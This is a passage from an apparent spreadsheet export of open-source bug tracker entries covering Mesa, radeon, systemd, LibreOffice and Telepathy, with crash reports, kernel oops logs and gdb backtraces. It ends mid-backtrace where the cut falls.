    <t>Please remove all files (attachments from bug 66457 asap and let me know when it is done.
Regards
Boudewijn</t>
  </si>
  <si>
    <t>boudewijn.charite</t>
  </si>
  <si>
    <t>DRI-90355</t>
  </si>
  <si>
    <t>DRI_PRIME+radeon+steam=problems + crash</t>
  </si>
  <si>
    <t>I'm using ubuntu 15.04 on a thinkpad s440 laptop.
This laptop uses a Intel Haswel card and a AMD HD8670M and i'm the distro default mesa driver (10.5.2)
i' doing this to enable DRI_PRIME support:
xrandr --setprovideroffloadsink radeon Intel
xcompmgr &amp;
DRI_PRIME=1 steam
please note that i'm using fluxbox and if i don't enble xcompmgr i don't seen anthing (DRI_PRIME=1 glxgears will only show up a empty windows where with xcompmgr i can see the glxgears running)
So first problem is this i require xcompmgr to enable DRI_PRIME. Also check this bug report: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1430888
If not dupe i can open a new bug for this problem.
Anyway main problem...
A few seconds after starting steam i get a crash with this dump:
May  7 00:46:12 danielleite kernel: [  230.148387] [drm] ib test on ring 1 succeeded in 0 usecs
May  7 00:46:12 danielleite kernel: [  230.148409] [drm] ib test on ring 2 succeeded in 0 usecs
May  7 00:46:12 danielleite kernel: [  230.148424] [drm] ib test on ring 3 succeeded in 0 usecs
May  7 00:46:12 danielleite kernel: [  230.148442] [drm] ib test on ring 4 succeeded in 0 usecs
May  7 00:46:20 danielleite kernel: [  238.246752] BUG: unable to handle kernel NULL pointer dereference at 0000000000000d60
May  7 00:46:20 danielleite kernel: [  238.246777] IP: [] radeon_fence_signaled+0x49/0x90 [radeon]
May  7 00:46:20 danielleite kernel: [  238.246810] PGD 222766067 PUD 0 
May  7 00:46:20 danielleite kernel: [  238.246820] Oops: 0000 [#1] SMP 
May  7 00:46:20 danielleite kernel: [  238.246830] Modules linked in: xt_CHECKSUM iptable_mangle ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_nat_ipv4 nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack nf_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp bridge stp llc ebtable_filter ebtables ip6table_filter ip6_tables iptable_filter ip_tables x_tables pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) ctr ccm binfmt_misc rfcomm bnep arc4 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common intel_rapl iosf_mbi btusb x86_pkg_temp_thermal videodev bluetooth intel_powerclamp media iwlmvm coretemp mac80211 kvm_intel kvm snd_hda_codec_hdmi snd_hda_codec_conexant snd_hda_codec_generic iwlwifi joydev snd_hda_intel serio_raw snd_hda_controller snd_hda_codec snd_hwdep thinkpad_acpi nvram cfg80211 rtsx_pci_ms lpc_ich snd_seq_midi snd_pcm snd_seq_midi_event snd_rawmidi memstick mei_me mei shpchp snd_seq snd_seq_device snd_timer snd soundcore intel_smartconnect mac_hid parport_pc ppdev lp parport autofs4 btrfs xor raid6_pq dm_crypt rtsx_pci_sdmmc crct10dif_pclmul crc32_pclmul amdkfd amd_iommu_v2 ghash_clmulni_intel radeon aesni_intel aes_x86_64 lrw gf128mul glue_helper i915 ablk_helper cryptd psmouse ttm i2c_algo_bit drm_kms_helper ahci libahci drm r8169 rtsx_pci mii video
May  7 00:46:20 danielleite kernel: [  238.247160] CPU: 0 PID: 3323 Comm: steam Tainted: G           OE   4.0.0-040000-generic #201504121935
May  7 00:46:20 danielleite kernel: [  238.247182] Hardware name: LENOVO 20AYA05KPG/20AYA05KPG BIOS J3ET59WW (1.59 ) 07/15/2014
May  7 00:46:20 danielleite kernel: [  238.247203] task: ffff8802249c5a00 ti: ffff8800bb0a0000 task.ti: ffff8800bb0a0000
May  7 00:46:20 danielleite kernel: [  238.247221] RIP: 0010:[]  [] radeon_fence_signaled+0x49/0x90 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247253] RSP: 0018:ffff8800bb0a3978  EFLAGS: 00010246
May  7 00:46:20 danielleite kernel: [  238.247266] RAX: 0000000000000000 RBX: ffff8800c6d0f480 RCX: 000000010040001c
May  7 00:46:20 danielleite kernel: [  238.247283] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
May  7 00:46:20 danielleite kernel: [  238.247301] RBP: ffff8800bb0a3998 R08: ffff8802235fc8c0 R09: 000000010040001c
May  7 00:46:20 danielleite kernel: [  238.247318] R10: ffffffffc04e032c R11: 0000000000018bf8 R12: 0000000000000000
May  7 00:46:20 danielleite kernel: [  238.247335] R13: 0000000000000d60 R14: 0000000000000100 R15: ffff8802249c5a00
May  7 00:46:20 danielleite kernel: [  238.247353] FS:  0000000000000000(0000) GS:ffff88022f200000(0063) knlGS:00000000f39b2b40
May  7 00:46:20 danielleite kernel: [  238.247372] CS:  0010 DS: 002b ES: 002b CR0: 0000000080050033
May  7 00:46:20 danielleite kernel: [  238.247386] CR2: 0000000000000d60 CR3: 0000000223512000 CR4: 00000000001407f0
May  7 00:46:20 danielleite kernel: [  238.247411] Stack:
May  7 00:46:20 danielleite kernel: [  238.247421]  ffff8800bb0a3998 ffff880224a83c40 ffff88020c3e56c0 ffff880221305a38
May  7 00:46:20 danielleite kernel: [  238.247443]  ffff8800bb0a39c8 ffffffffc04e03b4 ffff8800bb0a3c00 ffff880221305990
May  7 00:46:20 danielleite kernel: [  238.247463]  ffff8800bb0a3c00 0000000000005d00 ffff8800bb0a3ac8 ffffffffc04e0ac8
May  7 00:46:20 danielleite kernel: [  238.247483] Call Trace:
May  7 00:46:20 danielleite kernel: [  238.247508]  [] radeon_sa_bo_try_free+0x64/0x80 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247540]  [] radeon_sa_bo_new+0xf8/0x3b0 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247567]  [] ? radeon_irq_kms_disable_hpd+0xb0/0xb0 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247599]  [] radeon_ib_get+0x42/0xe0 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247625]  [] radeon_cs_ib_fill+0x85/0x220 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247652]  [] radeon_cs_ioctl+0x10b/0x200 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247677]  [] drm_ioctl+0x2e6/0x590 [drm]
May  7 00:46:20 danielleite kernel: [  238.247702]  [] ? radeon_cs_parser_init+0x400/0x400 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247722]  [] ? futex_wake+0x72/0x140
May  7 00:46:20 danielleite kernel: [  238.247742]  [] radeon_drm_ioctl+0x5d/0xa0 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247769]  [] radeon_kms_compat_ioctl+0x14/0x30 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247788]  [] compat_SyS_ioctl+0xb8/0x220
May  7 00:46:20 danielleite kernel: [  238.247804]  [] sysenter_dispatch+0x7/0x21
May  7 00:46:20 danielleite kernel: [  238.247817] Code: 89 fb 4c 89 6d f8 74 39 8b 77 68 4c 8b 67 60 48 8b 7f 58 89 f0 48 89 c2 48 c1 e0 08 48 c1 e2 04 48 29 d0 4c 8d ac 07 60 0d 00 00  8b 45 00 49 39 c4 77 1e 48 89 df e8 96 e0 0e c1 b8 01 00 00 
May  7 00:46:20 danielleite kernel: [  238.247893] RIP  [] radeon_fence_signaled+0x49/0x90 [radeon]
May  7 00:46:20 danielleite kernel: [  238.247919]  RSP 
May  7 00:46:20 danielleite kernel: [  238.247927] CR2: 0000000000000d60
May  7 00:46:20 danielleite kernel: [  238.252481] ---[ end trace b0a26b210316c3d3 ]---
Thanks for the help and for mesa &amp; open drivers!</t>
  </si>
  <si>
    <t>higuita</t>
  </si>
  <si>
    <t>CAIRO-7234</t>
  </si>
  <si>
    <t>Do not regenerate cairo-features.h on each configure run</t>
  </si>
  <si>
    <t>MESA-33492</t>
  </si>
  <si>
    <t>Wayland clients immediately segfaulting starting with 731ec60da3ccb92f5bfb4d6f1bc3c8e712751376</t>
  </si>
  <si>
    <t>Wayland clients start segfaulting immediately for me as of this commit (while using nouveau):
$ git bisect bad
731ec60da3ccb92f5bfb4d6f1bc3c8e712751376 is the first bad commit
commit 731ec60da3ccb92f5bfb4d6f1bc3c8e712751376
Author: Dimitry Andric 
Date:   Tue Jan 25 09:22:12 2011 -0700
    glapi: adding missing @GOTPCREL qualifer in glapi_x86-64.S
$ libtool --mode=execute gdb wayland/clients/terminal
GNU gdb (GDB) 7.2-ubuntu
Copyright (C) 2010 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-linux-gnu.
For bug reporting instructions please see:
...
Reading symbols from /home/darxus/wayland/wayland/clients/.libs/lt-terminal...done.
(gdb) run
Starting program: /home/darxus/wayland/wayland/clients/.libs/lt-terminal 
[Thread debugging using libthread_db enabled]
 -&gt; display@1.range(1280)
 -&gt; display@1.global(new id 1 display 1)
 -&gt; display@1.global(new id 2 drm 1)
 -&gt; display@1.global(new id 3 compositor 1)
 -&gt; display@1.global(new id 4 visual 1)
 -&gt; display@1.global(new id 5 visual 1)
 -&gt; display@1.global(new id 6 visual 1)
 -&gt; display@1.global(new id 7 shm 1)
 -&gt; display@1.global(new id 8 shell 1)
 -&gt; display@1.global(new id 9 screenshooter 1)
 -&gt; display@1.global(new id 10 output 1)
 -&gt; display@1.global(new id 11 input_device 1)
 -&gt; drm@2.device(/dev/dri/card0)
 -&gt; output@10.geometry(0 0 1024 640)
drm@2.authenticate(31)
 -&gt; drm@2.authenticated()
libEGL debug: EGL search path is /home/darxus/install/lib/egl
libEGL debug: added /home/darxus/install/lib/egl/egl_gallium.so to module array
libEGL debug: added egl_dri2 to module array
libEGL debug: added egl_glx to module array
libEGL debug: dlopen(/home/darxus/install/lib/egl/egl_gallium.so)
libEGL info: use DRM for display 0x6
libEGL debug: searching for pipe module nouveau
libEGL debug: loaded /home/darxus/install/lib/egl/pipe_nouveau.so
libEGL debug: Failed to get KMS resources.  Disable modeset.
libEGL debug: the best driver is Gallium
libEGL debug: searching for st module GL
libEGL debug: loaded /home/darxus/install/lib/egl/st_GL.so
Mesa warning: couldn't open libtxc_dxtn.so software DXTn compression/decompression unavailable
nv50_screen_get_param:135 -  Unknown PIPE_CAP 43
Program received signal SIGSEGV Segmentation fault.
glGetString () at glapi_x86-64.S:9876
9876		movq	2200(%rax) %r11
(gdb) backtrace
#0  glGetString () at glapi_x86-64.S:9876
#1  0x00007ffff74f5cb8 in _cairo_gl_get_version () at cairo-gl-info.c:39
#2  0x00007ffff74f458c in _cairo_gl_dispatch_init (dispatch=0x1f02 get_proc_addr=0x7ffff79c07f0 )
    at cairo-gl-dispatch.c:127
#3  0x00007ffff74f9c00 in cairo_egl_device_create (dpy=0x620a70 egl=0x6381f0) at cairo-egl-context.c:182
#4  0x0000000000409d01 in init_drm (argc= argv=0x7fffffffdce0 
    option_entries=) at window.c:1615
#5  display_create (argc= argv=0x7fffffffdce0 option_entries=)
    at window.c:1674
#6  0x0000000000407804 in main (argc=1 argv=0x7fffffffde08) at terminal.c:2385
(gdb)</t>
  </si>
  <si>
    <t>SYSTEMD-50779</t>
  </si>
  <si>
    <t>Wrong setting After in a service systemd-udev-settle.service</t>
  </si>
  <si>
    <t>A service systemd-udev-settle.service contains a setting After=udev-trigger.service although it should be After=systemd-udev-trigger.service</t>
  </si>
  <si>
    <t>sergey.koroteev</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-10974</t>
  </si>
  <si>
    <t>real name: Paolo Durante
email: shackan@gmail.com
account name: shackan
requesting an account to host the C++ bindings which are currently maintained off site
see http://www.freedesktop.org/wiki/Software/DBusBindings</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-12569</t>
  </si>
  <si>
    <t>*.exe is associated to two mimetypes</t>
  </si>
  <si>
    <t>Both application/x-executable and application/x-ms-dos-executable have the glob *.exe.
I don't think this makes sense looking at the magic matches x-executable seems to be for unix executables so it shouldn't have the *.exe glob.
On a related note a mimetype for *.dll would reduce sniffing needs when opening windows directories.</t>
  </si>
  <si>
    <t>LIBREOFFICE-72293</t>
  </si>
  <si>
    <t>EDITING: Crash after a second deleting of rows in the sample file.</t>
  </si>
  <si>
    <t>Created attachment 90206
Sample calc file
With the attached file:
Select e.g. row 20 with the mouse and use Crtl - to delete the row
no issue.
Select e.g. row 22 with the mouse and use Crtl - to delete the row
calc crash.
Reproducible with some other spreadsheet but not with a new one.
Win7x64Ultimate
Version: 4.2.0.0.beta1 Build ID: f4ca7b35f580827ad2c69ea6d29f7c9b48ebbac7
Version: 4.3.0.0.alpha0+ Build ID: 86268546a09c3bdd0d5cb6bc047408db779e057c
TinderBox: Win-x86@47-TDF Branch:master Time: 2013-12-03_15:52:47
No reproducible with 4.1.4</t>
  </si>
  <si>
    <t>MESA-79085</t>
  </si>
  <si>
    <t>Khronos conformance test ES3-CTS.shaders.struct.uniform.sampler_nested_vertex assert fails</t>
  </si>
  <si>
    <t>Tested with mesa master (46737ce) on IVB. I haven't tested but looks like issue can also be reproduced on HSW and BDW. 
Test log:
glcts: brw_reg.h:240: brw_reg brw_reg(unsigned int unsigned int unsigned int unsigned int unsigned int unsigned int unsigned int unsigned int unsigned int): Assertion `nr &lt; 128' failed.
Stack trace:
#3  0x0000003b90a2ea02 in __GI___assert_fail (assertion=0x7ffff7495ea6 nr  brw_reg brw_reg(unsigned int unsigned int unsigne
d int unsigned int unsigned int unsigned int unsigned int unsigned int unsigned int)) at assert.c:101
#4  0x00007ffff7391358 in brw_reg (file=1 nr=16384 subnr=4 type=4 vstride=3 width=2 hstride=1 swizzle=228 writemask=15) at brw_reg.h:240
#5  0x00007ffff739157c in brw_vec4_reg (file=1 nr=16384 subnr=4) at brw_reg.h:313
#6  0x00007ffff739175c in brw_vec4_grf (nr=16384 subnr=4) at brw_reg.h:574
#7  0x00007ffff7391e37 in brw::vec4_instruction::get_src (this=0x18db9a0 prog_data=0x7fffffffd1f0 i=0) at brw_vec4_generator.cpp:107
#8  0x00007ffff7394ed5 in brw::vec4_generator::generate_code (this=0x7fffffffc2d0 instructions=0x7fffffffc3b0) at brw_vec4_generator.cpp:1308
#9  0x00007ffff73951e6 in brw::vec4_generator::generate_assembly (this=0x7fffffffc2d0 instructions=0x7fffffffc3b0 assembly_size=0x7fffffffd394) at brw_vec4_generator.cpp:1365
#10 0x00007ffff738ff6e in brw_vs_emit (brw=0x7ffff6d11040 prog=0x18e60f0 c=0x7fffffffd2e0 prog_data=0x7fffffffd1f0 mem_ctx=0x1c54200 final_assembly_size=0x7fffffffd394) at brw_vec4.cpp:1850
#11 0x00007ffff73c1d6c in do_vs_prog (brw=0x7ffff6d11040 prog=0x18e60f0 vp=0x1c45860 key=0x7fffffffd3f0) at brw_vs.c:293
#12 0x00007ffff73c2a0a in brw_vs_precompile (ctx=0x7ffff6d11040 prog=0x18e60f0) at brw_vs.c:542
#13 0x00007ffff7382ee4 in brw_shader_precompile (ctx=0x7ffff6d11040 prog=0x18e60f0) at brw_shader.cpp:78
#14 0x00007ffff73836f8 in brw_link_shader (ctx=0x7ffff6d11040 shProg=0x18e60f0) at brw_shader.cpp:274
#15 0x00007ffff71f1d5a in _mesa_glsl_link_shader (ctx=0x7ffff6d11040 prog=0x18e60f0) at program/ir_to_mesa.cpp:3092</t>
  </si>
  <si>
    <t>TELEPATHY-37846</t>
  </si>
  <si>
    <t>Deadlock in call-content.c:src_pad_added</t>
  </si>
  <si>
    <t>I was doing a call with empathy-call and it has deadlock. The bt is:
__lll_lock_wait () at ../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:136
136	../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S: No such file or directory.
	in ../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S
(gdb) bt
#0  __lll_lock_wait () at ../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:136
#1  0x00007ff5879bc329 in _L_lock_926 () from /lib/libpthread.so.0
#2  0x00007ff5879bc14b in __pthread_mutex_lock (mutex=0x2009e40) at pthread_mutex_lock.c:61
#3  0x00007ff58b76cb00 in src_pad_added (fsstream=0x1d4fd50 pad=0x1dd6c40 codec=0x1f35f20 content=0x1f0e050) at call-content.c:1172
#4  0x00007ff58368be7e in g_closure_invoke (closure=0x21c4d70 return_value=0x0 n_param_values=3 param_values=0x1f41770 invocation_hint=0x7fffcd7fd2f0)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#5  0x00007ff58369d8d7 in signal_emit_unlocked_R (node= detail=0 instance=0x1d4fd50 emission_return=0x0 
    instance_and_params=0x1f41770) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3252
#6  0x00007ff5836a6d05 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2983
#7  0x00007ff5836a6ed3 in g_signal_emit (instance= signal_id= detail=)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3040
#8  0x00007ff56f843db9 in _transmitter_pad_have_data_callback (pad= buffer= user_data=)
    at /tmp/buildd/farsight2-0.0.28/./gst/fsrawconference/fs-raw-session.c:1349
#9  0x00007ff5889a79c8 in gst_marshal_BOOLEAN__POINTER (closure=0x21c4290 return_value=0x7fffcd7fd7e0 n_param_values= 
    param_values=0x7fffcd7fd908 invocation_hint= marshal_data=) at gstmarshal.c:586
#10 0x00007ff58368be7e in g_closure_invoke (closure=0x21c4290 return_value=0x7fffcd7fd7e0 n_param_values=2 param_values=0x7fffcd7fd908 
    invocation_hint=0x7fffcd7fd7a0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#11 0x00007ff58369d8d7 in signal_emit_unlocked_R (node= detail=190 instance=0x2174540 emission_return=0x7fffcd7fd938 
    instance_and_params=0x7fffcd7fd908) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3252
#12 0x00007ff5836a62c7 in g_signal_emitv (instance_and_params= signal_id= detail=190 return_value=0x7fffcd7fd938)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2888
#13 0x00007ff58892f63b in gst_pad_emit_have_data_signal (pad= obj=0x21ca740) at gstpad.c:4143
#14 0x00007ff58896a0db in gst_pad_push_event (pad=0x2174540 event=0x21ca740) at gstpad.c:5236
#15 0x00007ff588953741 in gst_proxy_pad_do_event (pad= event=0x21ca740) at gstghostpad.c:114
#16 0x00007ff588969c82 in gst_pad_send_event (pad=0x1f14890 event=0x21ca740) at gstpad.c:5398
#17 0x00007ff58896a203 in gst_pad_push_event (pad=0x2178190 event=0x21ca740) at gstpad.c:5250
#18 0x00007ff566faa743 in fs_funnel_event (pad= event=0x21ca740) at /tmp/buildd/farsight2-0.0.28/./gst/funnel/fs-funnel.c:333
#19 0x00007ff588969c82 in gst_pad_send_event (pad=0x21c8ca0 event=0x21ca740) at gstpad.c:5398
#20 0x00007ff58896a203 in gst_pad_push_event (pad=0x21c8b20 event=0x21ca740) at gstpad.c:5250
#21 0x00007ff58b9af5d6 in gst_base_src_change_state (element=0x21d2180 transition=) at gstbasesrc.c:3125
#22 0x00007ff566da3f6f in ?? () from /usr/lib/gstreamer-0.10/libgstshm.so
#23 0x00007ff58894ca5c in gst_element_change_state (element=0x21d2180 transition=) at gstelement.c:2718
#24 0x00007ff58894cd1b in gst_element_change_state (element=0x21d2180 transition=) at gstelement.c:2762
#25 0x00007ff58894d442 in gst_element_set_state_func (element=0x21d2180 state=GST_STATE_NULL) at gstelement.c:2674
#26 0x00007ff5671aee49 in fs_shm_transmitter_check_shm_src (self=0x1ff4c80 shm=0x21ca780 path=)
    at /tmp/buildd/farsight2-0.0.28/./transmitters/shm/fs-shm-transmitter.c:641
#27 0x00007ff5671afaf4 in fs_shm_stream_transmitter_dispose (object=0x1fd9020)
    at /tmp/buildd/farsight2-0.0.28/./transmitters/shm/fs-shm-stream-transmitter.c:258
#28 0x00007ff58368d1ca in g_object_unref (_object=0x1fd9020) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#29 0x00007ff56f846bdf in fs_raw_stream_real_dispose (object=) at /tmp/buildd/farsight2-0.0.28/./gst/fsrawconference/fs-raw-stream.c:316
#30 fs_raw_stream_dispose (object=) at /tmp/buildd/farsight2-0.0.28/./gst/fsrawconference/fs-raw-stream.c:368
#31 0x00007ff58368d1ca in g_object_unref (_object=0x1d4fd50) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
---Type  to continue or q  to quit---
#32 0x00007ff58b76a666 in free_content_fsstream (data=0x1f502c0) at call-content.c:193
#33 0x00007ff582d96045 in g_ptr_array_remove_index_fast (farray= index_=0) at /tmp/buildd/glib2.0-2.28.6/./glib/garray.c:1077
#34 0x00007ff58b76ca5c in _tf_call_content_put_fsstream (content=0x1f0e050 fsstream=0x1d4fd50) at call-content.c:1151
#35 0x00007ff58b76cf26 in tf_call_stream_dispose (object=0x1ff4be0) at call-stream.c:85
#36 0x00007ff58368d1ca in g_object_unref (_object=0x1ff4be0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#37 0x00007ff582db004e in g_hash_table_remove_all_nodes (hash_table=0x1f31f70 notify=1) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:492
#38 0x00007ff582db093d in g_hash_table_remove_all (hash_table=0x1f31f70) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:1171
#39 0x00007ff582db09d5 in g_hash_table_destroy (hash_table=0x1f31f70) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:877
#40 0x00007ff58b76a72d in tf_call_content_dispose (object=0x1f0e050) at call-content.c:214
#41 0x00007ff58368d1ca in g_object_unref (_object=0x1f0e050) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#42 0x00007ff582db004e in g_hash_table_remove_all_nodes (hash_table=0x1f320f0 notify=1) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:492
#43 0x00007ff582db093d in g_hash_table_remove_all (hash_table=0x1f320f0) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:1171
#44 0x00007ff582db09d5 in g_hash_table_destroy (hash_table=0x1f320f0) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:877
#45 0x00007ff58b76938a in tf_call_channel_dispose (object=0x1feb280) at call-channel.c:235
#46 0x00007ff58368d1ca in g_object_unref (_object=0x1feb280) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#47 0x00007ff58b766eca in tf_channel_dispose (object=0x1f32000) at channel.c:347
#48 0x00007ff58368d1ca in g_object_unref (_object=0x1f32000) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#49 0x0000000000426cb4 in empathy_call_window_hangup_cb (object= window=0x1d720c0) at empathy-call-window.c:3096
#50 0x00007ff58368be7e in g_closure_invoke (closure=0x1d9e340 return_value=0x0 n_param_values=1 param_values=0x1f476e0 invocation_hint=0x7fffcd7fe210)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#51 0x00007ff58369d8d7 in signal_emit_unlocked_R (node= detail=0 instance=0x1d4f6f0 emission_return=0x0 
    instance_and_params=0x1f476e0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3252
#52 0x00007ff5836a6d05 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2983
#53 0x00007ff5836a7092 in g_signal_emit_by_name (instance= detailed_signal=0x7ff5858e8143 clicked)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3077
#54 0x00007ff58368be7e in g_closure_invoke (closure=0x1dab560 return_value=0x0 n_param_values=1 param_values=0x1f52ca0 invocation_hint=0x7fffcd7fe6b0)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#55 0x00007ff58369d8d7 in signal_emit_unlocked_R (node= detail=0 instance=0x1da6180 emission_return=0x0 
    instance_and_params=0x1f52ca0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3252
#56 0x00007ff5836a6d05 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2983
#57 0x00007ff5836a6ed3 in g_signal_emit (instance= signal_id= detail=)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3040
#58 0x00007ff58568dec5 in gtk_real_button_released (button=0x1da6180) at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkbutton.c:1725
#59 0x00007ff58368be7e in g_closure_invoke (closure=0x1cf4d10 return_value=0x0 n_param_values=1 param_values=0x1f49aa0 invocation_hint=0x7fffcd7feae0)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#60 0x00007ff58369d09c in signal_emit_unlocked_R (node= detail=0 instance=0x1da6180 emission_return=0x0 
    instance_and_params=0x1f49aa0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3182
#61 0x00007ff5836a6d05 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2983
#62 0x00007ff5836a6ed3 in g_signal_emit (instance= signal_id= detail=)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3040
---Type  to continue or q  to quit---
#63 0x00007ff58568cc7d in gtk_button_button_release (widget= event=)
    at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkbutton.c:1617
#64 0x00007ff585737d48 in _gtk_marshal_BOOLEAN__BOXED (closure=0x1ce0580 return_value=0x7fffcd7fef80 n_param_values= 
    param_values=0x1c9b0a0 invocation_hint= marshal_data=)
    at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkmarshalers.c:86
#65 0x00007ff58368be7e in g_closure_invoke (closure=0x1ce0580 return_value=0x7fffcd7fef80 n_param_values=2 param_values=0x1c9b0a0 
    invocation_hint=0x7fffcd7fef40) at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#66 0x00007ff58369d6e8 in signal_emit_unlocked_R (node= detail=0 instance=0x1da6180 emission_return=0x7fffcd7ff0f0 
    instance_and_params=0x1c9b0a0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3290
#67 0x00007ff5836a6aa5 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2993
#68 0x00007ff5836a6ed3 in g_signal_emit (instance= signal_id= detail=)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3040
#69 0x00007ff585853d8f in gtk_widget_event_internal (widget=0x1da6180 event=0x21d05d0) at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkwidget.c:4980
#70 0x00007ff585735f03 in IA__gtk_propagate_event (widget=0x1da6180 event=0x21d05d0) at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkmain.c:2489
#71 0x00007ff5857362b3 in IA__gtk_main_do_event (event=0x21d05d0) at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkmain.c:1684
#72 0x00007ff585138b7c in gdk_event_dispatch (source= callback= user_data=)
    at /scratch/build-area/gtk+2.0-2.24.4/gdk/x11/gdkevents-x11.c:2377
#73 0x00007ff582dc14a3 in g_main_dispatch (context=0x1cc06d0) at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:2440
#74 g_main_context_dispatch (context=0x1cc06d0) at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3013
#75 0x00007ff582dc1c80 in g_main_context_iterate (context=0x1cc06d0 block=1 dispatch=1 self=)
    at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3091
#76 0x00007ff582dc22f2 in g_main_loop_run (loop=0x1d25270) at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3299
#77 0x00007ff5857352b7 in IA__gtk_main () at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkmain.c:1256
#78 0x000000000041e991 in main (argc=1 argv=0x7fffcd7ff5f8) at empathy-call.c:186
(gdb) thread apply all bt
Thread 6 (Thread 0x7ff579fd6700 (LWP 4019)):
#0  0x00007ff582ac3663 in __poll (fds= nfds= timeout=-1) at ../sysdeps/unix/sysv/linux/poll.c:87
#1  0x00007ff582dc19e4 in g_main_context_poll (context=0x1de52f0 block=1 dispatch=1 self=)
    at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3404
#2  g_main_context_iterate (context=0x1de52f0 block=1 dispatch=1 self=) at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3086
#3  0x00007ff582dc22f2 in g_main_loop_run (loop=0x1de52d0) at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3299
#4  0x00007ff5839859d4 in gdbus_shared_thread_func (data=) at /tmp/buildd/glib2.0-2.28.6/./gio/gdbusprivate.c:276
#5  0x00007ff582de8cf6 in g_thread_create_proxy (data=0x1de53d0) at /tmp/buildd/glib2.0-2.28.6/./glib/gthread.c:1897
#6  0x00007ff5879b9b40 in start_thread (arg=) at pthread_create.c:304
#7  0x00007ff582ace28d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#8  0x0000000000000000 in ?? ()
Thread 5 (Thread 0x7ff56cfb5700 (LWP 4022)):
#0  0x00007ff582ac3663 in __poll (fds= nfds= timeout=1414) at ../sysdeps/unix/sysv/linux/poll.c:87
#1  0x00007ff56ebdbdcf in ?? () from /usr/lib/libpulse.so.0
#2  0x00007ff56ebcbbd6 in pa_mainloop_poll () from /usr/lib/libpulse.so.0
